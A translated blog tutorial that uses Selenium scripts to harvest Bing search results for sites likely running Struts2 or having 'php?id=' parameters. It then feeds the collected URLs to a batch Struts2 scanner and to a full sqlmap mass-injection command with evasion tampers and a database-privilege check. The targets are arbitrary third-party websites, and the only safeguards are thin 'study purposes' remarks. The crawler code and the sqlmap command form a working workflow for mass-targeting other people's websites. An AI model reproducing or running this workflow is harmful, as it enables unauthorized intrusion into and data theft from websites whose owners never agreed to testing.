How to Use Selenium to Crawl the Web for Known Vulnerabilities

This article shows how to use Selenium to crawl the web for sites that may be affected by known vulnerabilities. Let's walk through it together.


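Selenium basics

Introduction

When writing crawlers in Python, static pages are the easy case: the requests library handles the requests, and bs4 and lxml work very well for parsing the fetched pages.

The major search engines now load their results dynamically. For crawling dynamic pages, I have come across these approaches:

1. Direct URL: find the API endpoint that the page's JavaScript calls

2. WebKit: emulate the JavaScript by hand

3. scrapyjs: acts as glue that integrates Splash into Scrapy

4. Splash + Docker

5. PhantomJS + Selenium: drive a simulated browser; resource-hungry and not suited to large crawlers

Here we use approach 5. Selenium no longer pairs with PhantomJS (it can still be used), while Firefox and Google Chrome have both introduced headless modes, so we use the Chrome driver to get the job done. (When debugging, pay attention to versions: the CSS and XPath selector expressions may differ between versions.)

I did not use headless mode, mainly because a visible browser is easier to debug and this is only security research. If you want headless mode, change the setup like this: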

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(executable_path=r'D:\selenium\chrome/chromedriver.exe', chrome_options=chrome_options)

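Installing Selenium

Download the browser driver (see these guides):

https://www.cnblogs.com/freeweb/p/4568463.html

https://www.cnblogs.com/qiezizi/p/8632058.html

Then install the selenium library for Python (pip install selenium).

For the basic syntax, please search for a tutorial yourself.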

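Selenium FAQ

I want to stress this point: the syntax is simple, but debugging is a real chore.

1. Element cannot be located

This happens when an element is looked up before the page has finished loading. My first attempt was to call sleep(), but that caused the socket to disconnect, so I switched to Selenium's built-in explicit wait:

import selenium.webdriver.support.ui as ui
wait = ui.WebDriverWait(driver, 20)
print wait.until(lambda x: x.find_element_by_css_selector("#b_results > li.b_pag > nav > ul > li:nth-child(3) > a")).text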
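To make the difference from a fixed sleep() concrete, here is a minimal sketch of the polling idea behind an explicit wait. It is written for Python 3 and uses only the standard library; `wait_until` and `fake_lookup` are hypothetical names invented for this illustration, and the code is a simplified stand-in, not Selenium's actual implementation.

```python
import time


def wait_until(condition, timeout=20.0, poll_interval=0.5):
    """Poll `condition` until it returns a truthy value or `timeout` seconds pass.

    Hypothetical helper that mimics the idea of an explicit wait.
    """
    deadline = time.monotonic() + timeout
    while True:
        try:
            result = condition()
            if result:
                return result
        except LookupError:
            # "Not found yet" is expected while the page loads: keep polling.
            pass
        if time.monotonic() >= deadline:
            raise TimeoutError("condition not met within %.1f s" % timeout)
        time.sleep(poll_interval)


# Usage: the simulated element only becomes available on the third poll.
attempts = {"count": 0}


def fake_lookup():
    attempts["count"] += 1
    if attempts["count"] < 3:
        raise LookupError("element not loaded yet")
    return "Next page"


text = wait_until(fake_lookup, timeout=2.0, poll_interval=0.01)
print(text, attempts["count"])
```

The call returns as soon as the lookup succeeds instead of always blocking for a fixed time, which is why an explicit wait tends to be both faster and more reliable than sleep().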

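2. Python's ASCII default encoding

In Python 2 the default string encoding is ASCII; resetting it to UTF-8 avoids encoding errors (Python 3 does not need this workaround):

import sys
reload(sys)
sys.setdefaultencoding('utf-8')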

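3. Element not in view

This was the most painful one; it took me a long time to find a fix.

The error reported is "element not visible".

Simulating a mouse click with ActionChains solves it.

Reference:

http://www.mamicode.com/info-detail-1981462.html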

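4. Defining the crawl target

What should the crawler look for? We search the international version of Bing and collect sites that may be affected by Struts2 vulnerabilities.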
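The search itself is carried in the query string of the start URL that the script in this article opens. As a small sketch (Python 3, standard library only), the URL can be decoded to see which search term it encodes. Reading `first` as the offset of the first result on the page is my assumption about Bing's parameter, not something the article states.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Start URL copied from the script in this article.
start_url = (
    "https://cn.bing.com/search?q=inurl%3a.action%3f&qs=n&sp=-1"
    "&pq=inurl%3a.action%3f&sc=1-14&sk="
    "&cvid=DBCB283FC96249E8A522340DF4740769&first=67&FORM=PERE4"
)

# parse_qs percent-decodes each value and returns a list per key.
params = parse_qs(urlsplit(start_url).query)
query = params["q"][0]
first = int(params["first"][0])  # assumed: offset of the first result shown

print(query)   # inurl:.action?
print(first)   # 67

# Going the other way: percent-encode a search term for use in a URL.
encoded = urlencode({"q": query})
print(encoded)  # q=inurl%3A.action%3F
```

So the search term is `inurl:.action?`, which matches pages whose URL contains `.action?`, the usual suffix of Struts2 actions.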


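5. Writing the code

If you are interested, study how the script is put together. I will mention only a few points, since the rest of the syntax is simple: the script opens the search, then moves forward one page at a time and collects the result URLs on each page. The XPath and CSS selectors used here depend on the browser driver version you downloaded; open the page in your browser and adjust the selectors as needed. (Don't tell me it doesn't run; I have tested it myself.)

Code: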

#coding=utf-8
# Python 2 / Selenium 3 script: collect result links from Bing, page by page.
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import TimeoutException
# ActionChains provides the mouse actions
from selenium.webdriver.common.action_chains import ActionChains

start_url="https://cn.bing.com/search?q=inurl%3a.action%3f&qs=n&sp=-1&pq=inurl%3a.action%3f&sc=1-14&sk=&cvid=DBCB283FC96249E8A522340DF4740769&first=67&FORM=PERE4"
urls=[]  # collected result links (a list avoids writing unused placeholders to the file)
s=[1,2,3,4,5,6,7,8,9]  # result positions to read on each page
driver=webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")
wait=ui.WebDriverWait(driver,20)
driver.get(start_url)
for n in range(7,57):
    if n%2 == 1:  # China version
        i=7
    else:
        i=8
    i=7  # overrides the branch above, so the 7th pager item is always clicked
    for j in s:
        try:
            # International version: //*[@id="b_results"]/li[1]/h3/a
            #href=wait.until(lambda x: x.find_element_by_xpath('//*[@id="b_results"]/li['+str(j)+']/h3/a').get_attribute("href"))
            # China version
            href=wait.until(lambda x: x.find_element_by_xpath('/html/body/div[1]/ol[1]/li['+str(j)+']/h3/a').get_attribute("href"))
            print href
            urls.append(href)
        except Exception as e:
            continue
    try:
        print i
        # Click the pager link to move to the next page of results
        ActionChains(driver).click(wait.until(lambda x: x.find_element_by_css_selector("#b_results > li.b_pag > nav > ul > li:nth-child("+str(i)+") > a"))).perform()
    except Exception as e:
        continue
# The with block closes the file, so no explicit f.close() is needed
with open("urlss.txt","a+") as f:
    for url in urls:
        f.write(str(url))
        f.write('\n')
driver.quit()
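Paging through search results tends to return the same link more than once, and failed lookups can leave empty entries behind. The following is a minimal Python 3 sketch of cleaning the collected list before it is written to disk; `unique_urls` and the example.com addresses are hypothetical and not part of the original script.

```python
def unique_urls(urls):
    """Return http(s) URLs in first-seen order, dropping empty entries and repeats."""
    seen = set()
    result = []
    for url in urls:
        if not isinstance(url, str):
            continue  # skip None or other placeholders
        url = url.strip()
        if not url.startswith(("http://", "https://")) or url in seen:
            continue
        seen.add(url)
        result.append(url)
    return result


# Usage with made-up sample data
collected = [
    "http://example.com/a.action?id=1",
    None,
    "http://example.com/a.action?id=1",
    "https://example.org/b.action?x=2",
    "",
]
cleaned = unique_urls(collected)
print(cleaned)
```

Keeping first-seen order means the output file still reflects the order in which the search engine returned the results.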

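Results

Here I used a company's batch testing tool.

Tool link:

https://www.jb51.net/softs/574358.html

An open-source Struts scanning tool is also available on GitHub. The project keeps pace with new disclosures and was just updated for S2-057, which came out a few days earlier.

Project address:

https://github.com/Lucifer1993/struts-scan

The test results are shown below:

[Figure: screenshot of the test results]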

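Supplement

SQL injection holes are hard to find these days. A couple of years ago they turned up in whole batches, but that is no longer the case. Even so, I wrote a crawler for them as well.

Target: search for the sensitive term inurl:php?id

Code: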

#coding=utf-8
# Python 2 / Selenium 3 script: collect Bing result links for inurl:php?id=
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import time
from selenium import webdriver
import selenium.webdriver.support.ui as ui
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import TimeoutException
# ActionChains provides the mouse actions
from selenium.webdriver.common.action_chains import ActionChains

start_url="https://cn.bing.com/search?q=inurl%3aphp%3fid%3d&qs=HS&sc=8-0&cvid=2EEF822D8FE54B6CAAA1CE0169CA5BC5&sp=1&first=53&FORM=PERE3"
urls=[]  # collected result links (a list avoids writing unused placeholders to the file)
s=[1,2,3,4,5,6,7,8,9,10,11,12,13,14]  # result positions to read on each page
driver=webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")
wait=ui.WebDriverWait(driver,20)
driver.get(start_url)
for i in range(1,50):
    for j in s:
        try:
            href=wait.until(lambda x: x.find_element_by_xpath('//*[@id="b_results"]/li['+str(j)+']/h3/a').get_attribute("href"))
            print href
            urls.append(href)
        except Exception as e:
            pass  # no result link at this position
    print i
    try:
        # Click the pager link to move to the next page of results
        ActionChains(driver).click(wait.until(lambda x: x.find_element_by_css_selector("#b_results > li.b_pag > nav > ul > li:nth-child(7) > a"))).perform()
    except Exception as e:
        continue
print len(urls)  # number of links collected
# The with block closes the file, so no explicit f.close() is needed
with open("urls.txt","a+") as f:
    for url in urls:
        f.write(str(url))
        f.write('\n')
driver.quit()

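Test results

Because a full run takes too long, I did not test this thoroughly, but the URLs were crawled successfully. Here is the sqlmap command:

(I am considering running sqlmap from a multi-threaded shell script. This is offered as an idea for study purposes only; such vulnerabilities are very rare now. Multi-threaded shell reference: https://blog.csdn.net/bluecloudmatrix/article/details/48421577)

sqlmap -m urls.txt --batch --delay=1.3 --level=3 --tamper=space2comment --dbms=MySQL --technique=EUS --random-agent --is-dba --time-sec=10 | tee result.txt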

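Command breakdown

1. sqlmap -m: read the target URLs from the given file

2. --delay: the delay in seconds between HTTP requests; by default sqlmap applies no delay

3. --level: how thorough the tests are (1 to 5, default 1); from level 3 request headers such as Referer and User-Agent are tested as well

4. --dbms=mysql: tell sqlmap that the back-end database is MySQL

5. --technique=EUS: restrict the injection techniques to E, U and S (blind injection is skipped because the run is already long). The technique letters are:

B: Boolean-based blind SQL injection

E: Error-based SQL injection

U: UNION query SQL injection

S: Stacked queries SQL injection

T: Time-based blind SQL injection

6. tee: a command used after a pipe that shows the output on screen and writes it to a file at the same time, for later analysis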
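As a quick way to check which techniques a given --technique value selects and which it leaves out, the letter table above can be turned into a small lookup. This is a Python 3 sketch; `TECHNIQUES` and `describe_techniques` are hypothetical names for this illustration, and the table covers only the five letters listed in this article.

```python
# Letter-to-name table taken from the list in this article.
TECHNIQUES = {
    "B": "Boolean-based blind",
    "E": "Error-based",
    "U": "UNION query",
    "S": "Stacked queries",
    "T": "Time-based blind",
}


def describe_techniques(letters):
    """Translate a --technique value such as "EUS" into technique names."""
    names = []
    for letter in letters.upper():
        if letter not in TECHNIQUES:
            raise ValueError("unknown technique letter: %r" % letter)
        names.append(TECHNIQUES[letter])
    return names


selected = describe_techniques("EUS")
skipped = [name for letter, name in TECHNIQUES.items() if letter not in "EUS"]
print(selected)  # ['Error-based', 'UNION query', 'Stacked queries']
print(skipped)   # ['Boolean-based blind', 'Time-based blind']
```

The skipped list confirms the point made in item 5: with EUS, both blind techniques are left out, which shortens the run.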


Original article URL: http://bm7419.com/article32/igsssc.html
